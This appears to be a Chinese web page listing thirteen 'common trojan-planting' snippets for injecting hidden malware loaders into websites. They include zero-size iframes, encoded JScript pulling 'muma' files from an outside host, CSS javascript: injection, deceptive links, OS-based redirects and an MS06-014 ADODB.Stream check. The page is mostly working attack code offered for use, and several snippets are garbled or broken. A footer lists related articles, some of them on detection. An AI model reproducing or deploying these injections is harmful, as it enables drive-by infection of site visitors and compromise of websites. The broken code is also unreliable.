总结常用的挂马代码

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码

document.write("<iframe width=‘0‘ height=‘0‘
src=‘地址‘></iframe>");

保存为xxx.js,

则JS挂马代码为

<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode"
src=http://www.upx.com.cn/muma.txt></script>

muma.txt可改成任意后缀

四:body挂马

<body ></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe
src="http://www.upx.com.cn/muma.htm/"></iframe>‘;

六:css中挂马

body {

background-image: url(‘javascript:document.write("<script
src=http://www.upx.com.cn/muma.js></script>")‘)}

七:JAJA挂马

<SCRIPT language=javascript>

window.open
("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");

</script>

八:图片伪装

<html>

<iframe src="网马地址" height=0 width=0></iframe>

<img src="图片地址"></center>

</html>

九:伪装调用

<frameset rows="444,0" cols="*">

<frame src="打开网页" framborder="no" scrolling="auto" noresize
marginwidth="0"margingheight="0">

<frame src="网马地址" frameborder="no" scrolling="no" noresize
marginwidth="0"margingheight="0">

</frameset>

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)"
onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>

<SCRIPT Language="JavaScript">

function www_163_com ()

{

var url="网马地址";

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");

}

</SCRIPT>

十一:判断系统代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD><TITLE>404</TITLE>

<META http-equiv=Content-Type content="text/html;
charset=windows-1252">

<META content="MSHTML 6.00.2900.2769"
name=GENERATOR></HEAD>

<BODY>

<SCRIPT language=javascript>

window.status="";

if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)

window.location.href="tk.htm";

else

window.location.href="upx06014.htm";

</SCRIPT>

</BODY></HTML>

十二:判断是否有ms06014代码

<script language=VBScript>

on error resume next

set server = document.createElement_x("object")

server.setAttribute "classid",
"clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"

set File = server.createobject(Adodb.Stream,"")

if Not Err.Number = 0 then

err.clear

document.write ("<iframe src=http://upx.com.cn width=100% height=100%
scrolling=no frameborder=0>")

else

document.write ("<iframe src=http://upx.com.cn width=100% height=100%
scrolling=no frameborder=0>")

end if

</script>

十三:智能读取js的代码demo

//读娶src的对象

var v = document.getElementByIdx_x("advjs");

//读娶src的参数

var u_num =
getUrlParameterAdv("showmatrix_num",v.getAttribute(‘src‘));

document.write("<iframe src=\"http://www.upx.com.cn/1/"+u_num+".htm\"
width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");

document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0
Transitional\/\/EN\">");

document.writeln("<HTML><HEAD>");

document.writeln("<META http-equiv=Content-Type content=\"text\/html;
charset=big5\">");

document.writeln("<META content=\"MSHTML 6.00.2900.3059\"
name=GENERATOR><\/HEAD>");

document.writeln("<BODY> ");

document.writeln("<DIV style=\"CURSOR:
url(\‘http:\/\/www.upx.com.cn\/demo.js\‘)\">");

document.writeln("<DIV ");

document.writeln("style=\"CURSOR:
url(\‘http:\/\/www.upx.com.cn\/demo.js\‘)\"><\/DIV><\/DIV><\/BODY><\/HTML>")

//分析src的参数函数

function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");

if (loU.length>1){

var loallPm = loU[1].split("&");

for (var i=0; i<loallPm.length; i++){

var loPm = loallPm.split("=");

if (loPm[0]==asName){

if (loPm.length>1){

return loPm[1];

}else{

return "";

}

}

}

}

return null;

时间: 2024-11-08 19:09:43

总结常用的挂马代码的相关文章

如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的工作原理及种类.常见方式.执行方式.如何检测网页是否被挂马.如何清除网页木马.如何防止网页被挂马. 1:网页挂马工作原理的种类. (1)工作原理: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制.为达到目的首

揭秘几种最主要的挂马技术

网页挂马是攻击者惯用的入侵手段,其影响极其恶劣.不仅让站点管理者蒙羞,而且殃及池鱼使站点的浏览者遭殃.不管是站点维护者还是个人用户,掌握.了解一定的网页挂马及其防御技术是非常必要的. 1.关于网页挂马 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机. 2.获取Webshell 攻击者要进行网页挂马,必须要获取对站点文件的修改权限,而获取该站点Webshell是最普遍的做法.

网页挂马方式

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

公司网站被挂马的解决办法

**网站被挂马青岛峰会期间本来想给自己放几天假的,因为公司的网站被挂马给泡汤了,打开公司网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多×××代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 : 公司网站被挂马的×××代码解释一下:这个代码是 PHP的代码是一种条件性的挂马,上面的google soso sogou baidu 都是挂马的条件,意思就是当从 google soso...等等搜索引擎来的访问客户会自动在网页上隐藏一行代码也就是挂马代码.

Web挂马方式整理

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加

网站图片挂马检测及PHP与python的图片文件恶意代码检测对比

前言 周一一早网管收到来自阿里云的一堆警告,发现我们维护的一个网站下有数十个被挂马的文件.网管直接关了vsftpd,然后把警告导出邮件给我们. 取出部分大致如下: 服务器IP/名称 木马文件路径 更新时间 木马类型 状态(全部) *.*.*.* /path/*144.gif 2017/8/7 5:53 Webshell 待处理 *.*.*.* /path/*132.jpg 2017/8/7 5:23 Webshell 待处理 *.*.*.* /path/*156.txt 2017/8/7 5:2

怎样进行网站被挂马检测?工具有哪些呢?

使用搜索引擎搜索"网站挂马检测"我们可以看到有许多的网站挂马检测工具及网站被挂马检测工具平台.我们来看看常用的网站被挂马检测工具及在线网站被挂马检测工具平台都有那些? 360网站安全检测平台(http://webscan.360.cn): 可以免费在线检测网站.网页木马.网站后门程序.网站漏洞等.网站在线被挂马检测,不需要网站验证,但如果想看到网站安全详情,就需要网站验证. 百度云观测(http://ce.baidu.com): 可以检测网站运行状况.网站安全性.网站访问速度.网站SE

如何防止博客,网站被挂马

经营网站不容易,网站被挂马或者被挂暗链说明网站的管理权限已落入他人之手,而且网站被挂马往往来给网站带来不可估量的负面影响,最常见的就是网站用户体验变形.网站被无故植入莫名其妙的js代码,网站被降权甚至是被K,而对于网站被马之后,很多站长都不能及时的发现并处理,导致网站出现状况后才有所感概.那么站长应该如何去防范这个网站最大的杀手呢?站长如何去检查自己的网站是否被挂马了呢?下面笔者以亲身经历来谈谈如何检查网站是否被挂马的几个方法,希望对大家有所帮助. 方法: 1.对于站长检查网站是否被挂马,其中最